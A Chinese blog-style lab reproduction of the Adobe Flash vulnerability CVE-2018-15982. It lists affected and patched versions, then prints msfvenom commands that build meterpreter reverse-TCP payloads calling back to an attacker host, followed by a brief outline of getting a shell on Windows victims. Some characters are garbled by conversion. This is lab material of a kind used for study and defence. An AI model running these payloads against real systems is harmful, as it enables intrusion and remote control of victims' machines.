CVE 2018 15982漏洞復現

2022-07-29 18:30:12 字數 3186 閱讀 7316

漏洞資訊:cve-2018-15982

adobe已發布適用於windows,macos,linux和chrome os的adobe flash player安全更新。這些更新解決乙個  關鍵的  adobe flash player的漏洞和乙個  重要的  adobe flash player的安裝程式的漏洞。成功利用可能導致當前使用者的上下文中的任意**執行和許可權提公升。

cvssv3分數和漏洞型別:

受cve-2018-15982影響的產品

產品

平台

adobe flash player桌面執行時

31.0.0.153及更早版本

windows,macos和linux

適用於google chrome的adobe flash player

31.0.0.153及更早版本

windows,macos,linux和chrome os 

適用於microsoft edge和internet explorer 11的adobe flash player

31.0.0.153及更早版本

windows 10和8.1和win7/其他版本為測試

adobe flash player安裝程式

08.0.0.108及更早版本

視窗漏洞危害:

漏洞類別

漏洞影響

嚴重

cve編號

免費使用

任意**執行

危急cve-2018-15982 

修復方法:對adb flash進行公升級

產品

平台

優先

可用性

adobe flash player桌面執行時

32.0.0.101

windows,macos

1flash player分發

適用於google chrome的adobe flash player

32.0.0.101

windows,macos,linux和chrome os 

1谷歌chrome發布

適用於microsoft edge和internet explorer 11的adobe flash player

32.0.0.101

windows 10和8.1

1microsoft安全通報

adobe flash player桌面執行時

32.0.0.101

linux的

3adobe flash player安裝程式

31.0.0.122視窗2

flash player分發

實驗環境

攻擊機:kali 2.0

受害機:win7 win10

使用工具

cve-2018-0802_cve-2017-11882-master exp

msfconsole

1.建立payload程式

msfvenom -p windows/meterpreter/reverse_tcp_rc4 rc4password=zale lport=6666 lhost=192.168.0.111 -f raw>86.bin

msfvenom -p windows/meterpreter/reverse_tcp_rc4 rc4password=zale lport=6666 lhost=192.168.0.111 -f raw>64.bin

這裡會生成兩個bin檔案,分別為86bin和64bin估計是32位平台和64位平台

監聽payload

開啟apache服務

發給受害機驗證是否成功

當受害者點選網頁時

可用清楚看到已經成功返回shell

漏洞復現 CVE 2019 0708 漏洞利用

2019年5月14日微軟官方發布安全補丁,修復了windows遠端桌面服務的遠端 執行漏洞,該漏洞影響了某些舊版本的windows系統。此漏洞是預身份驗證且無需使用者互動,這就意味著這個漏洞可以通過網路蠕蟲的方式被利用。利用此漏洞的任何惡意軟體都可能從被感染的計算機傳播到其他易受攻擊的計算機,其方式...

漏洞復現 CVE 2020 1938漏洞復現

tomcat connector 是 tomcat 與外界連線的通道,使得它與 catalina 能夠接收外部的請求,傳遞給對應的 web 應用程式處理,並返回對應的請求結果。http connector就是用來提供經常用到的http web服務,而ajp connector使用的ajp協議 apa...

CVE 2019 14287 漏洞復現

etc sudoers檔案配置不當,導致使用者可以繞過安全策略,以root身份執行命令。預設情況下的linux,不會遭受此攻擊 開啟linux中 etc sudoers,預設情況下如下圖所示。這是什麼意思呢?如果這樣配置,就允許test使用者以非root使用者之外的所有使用者許可權執行id這個命令。...